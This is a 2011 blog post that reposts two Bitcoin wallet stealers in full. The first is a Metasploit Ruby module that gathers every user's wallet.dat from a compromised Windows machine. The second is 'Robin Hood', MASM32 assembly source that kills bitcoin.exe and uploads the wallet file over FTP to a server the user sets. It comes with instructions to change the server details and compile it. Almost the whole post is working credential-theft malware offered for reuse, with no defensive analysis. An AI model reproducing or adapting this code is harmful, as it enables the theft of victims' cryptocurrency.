Insurgency Mod Scum: cheaters, hackers, wallhackers, aimbotters, griefers, teamkillers, micspammers, spawncampers, exitcampers, and everything else Insurgency.
Blogger.com policy on personal information: Personal and confidential information: It's not ok to publish another person's personal and confidential information. For example, don't post someone else's credit card numbers, Social Security numbers, unlisted phone numbers, and driver's license numbers. Also, please keep in mind that in most cases, information that is already available elsewhere on the Internet or in public records is not considered to be private or confidential under our policies.
All information posted on Insurgency Mod Scum is publicly available.

Robin Hood Bitcoin Jacker

2011-07-11

Posted by insurgencymod at Monday, July 11, 2011 Labels: ,
http://dev.metasploit.com/redmine/projects/framework/repository/revisions/12993/entry/modules/post/windows/gather/bitcoin_jacker.rb

# $Id: bitcoin_jacker.rb 12993 2011-06-21 03:26:07Z hdm $

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'


class Metasploit3 < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather Bitcoin wallet.dat',
'Description' => %q{ This module downloads any Bitcoin wallet.dat files from the target system},
'License' => MSF_LICENSE,
'Author' => [ 'illwill '],
'Version' => '$Revision: 12993 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end

def run
print_status("Checking All Users For Bitcoin Wallet...")
os = session.sys.config.sysinfo['OS']
drive = session.fs.file.expand_path("%SystemDrive%")

if os =~ /Windows 7|Vista|2008/
@appdata = '\\AppData\\Roaming\\'
@users = drive + '\\Users'
else
@appdata = '\\Application Data\\'
@users = drive + '\\Documents and Settings'
end

get_users

@userpaths.each do |path|
jack_wallet(path)
end
end

def jack_wallet(path)
data = ""
filename = "#{path}#{@appdata}\\Bitcoin\\wallet.dat"
found = client.fs.file.stat(filename) rescue nil
return if not found

print_status("Wallet Found At #{filename}")
print_status(" Jackin their wallet...")

kill_bitcoin

begin
wallet = session.fs.file.new(filename, "rb")
until wallet.eof?
data << wallet.read end store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet") print_status(" Wallet Jacked.") rescue ::Interrupt raise $! rescue ::Exception => e
print_error("Failed to download #{filename}: #{e.class} #{e}")
end
end

def get_users
@userpaths = []
session.fs.dir.foreach(@users) do |path|
next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
@userpaths << "#{@users}\\#{path}\\" end end def kill_bitcoin client.sys.process.get_processes().each do |x| if x['name'].downcase == "bitcoin.exe" print_status(" #{x['name']} Process Found...") print_status(" Killing Process ID #{x['pid']}...") session.sys.process.kill(x['pid']) rescue nil end end end end

http://forums.gothack.net/showthread.php?18-Bitcion-Stealer
http://illmob.org/Sources/RobinHood.html

; ::Click Here Download Source Here::
; Robin Hood - BitCoin Jacker
; by [ill]will
; steal from the rich and give to the poor
; by dumping the wallet to "public" ftp
;
; Send Me Money if it makes you rich :D
; 14P9t8ceqRzvJ4KhMWnjKQ4TwcLxWwk7j4
; 'randomize' proc found somewhere on the net
; ftp.microsoft.com does not let you upload files
; so change the info and compile with MASM
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

include \masm32\include\masm32rt.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib

FTPit PROTO :DWORD,:DWORD,:DWORD
KillMe PROTO :DWORD
Randomize PROTO
Random PROTO :DWORD
ThePort equ 21

.data
ftpsite db "ftp.microsoft.com",0 ;change the server
Username db "anonymous",0 ;change the username
Password db "bitcoin@microsoft.com",0 ;change the password
szTheVictim db "bitcoin.exe",0
RandWallet db "%s-wallet.dat",0
AppData db "AppData",0
wallet db "%s\Bitcoin\wallet.dat",0
random_seed dd ?
res dd 0
sFmt db '%u',0
sBuf db 10 dup(0)


.data?
buffer db MAX_PATH dup(?)
WalletPath db 256 dup(?)
WalletFTP db 256 dup(?)
szBuffer db 256 dup(?)

.code

start:

invoke KillMe, addr szTheVictim ;kill the bitcoin process
invoke Randomize ;generate a random number
invoke Random,9999999
mov res,EAX
invoke wsprintf,ADDR sBuf,ADDR sFmt,res ;append it to our ftp upload filename
invoke wsprintf,addr WalletFTP,addr RandWallet, addr sBuf ;ex: 9586293-wallet.dat

invoke GetEnvironmentVariable, addr AppData, addr buffer, sizeof buffer ;get the %AppDATA% folder
invoke wsprintf,addr WalletPath,addr wallet, addr buffer ;append the bitcoin wallet

invoke FTPit, addr ftpsite, addr WalletPath,addr WalletFTP ; send that shit to a public ftp
invoke ExitProcess, 0



FTPit PROC FTPserver:DWORD, lpszFile:DWORD, lpRemoteFile:DWORD
local hInternet:DWORD
local ftpHandle:DWORD
local context:DWORD
local InternetStatusCallback:DWORD
invoke InternetOpen,NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
mov hInternet, eax
invoke InternetConnect,hInternet,FTPserver,ThePort ,\ ;if different port change INTERNET_DEFAULT_FTP_PORT to port #
ADDR Username,ADDR Password,INTERNET_SERVICE_FTP,\
INTERNET_FLAG_PASSIVE,ADDR context
mov ftpHandle,eax
invoke FtpPutFile,ftpHandle,lpszFile,lpRemoteFile,FTP_TRANSFER_TYPE_BINARY,NULL
invoke InternetCloseHandle,ftpHandle
invoke InternetCloseHandle, hInternet
ret
err:
invoke GetErrDescription,eax
ret
FTPit endp



Random proc dwBase:dword
push ebx
mov eax,dwBase
xor ebx,ebx
imul edx,random_seed,08088405h
inc edx
mov random_seed,edx
mul edx
mov eax,edx
pop ebx
ret
Random endp

Randomize proc
invoke GetTickCount
mov random_seed,eax
ret
Randomize endp

KillMe proc szFile:dword
LOCAL Process:PROCESSENTRY32

mov Process.dwSize, sizeof Process
invoke CreateToolhelp32Snapshot, 2, 0
mov esi, eax
invoke Process32First, esi, addr Process
@@loop:
invoke lstrcmpiA,szFile, addr Process.szExeFile
test eax, eax
jnz @@continue
invoke OpenProcess, 0001h, 0, Process.th32ProcessID
invoke TerminateProcess, eax, 0
@@continue:
invoke Process32Next, esi, addr Process
test eax, eax
jz @@done
jmp @@loop
@@done:
invoke CloseHandle, esi
ret
KillMe endp


end start

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)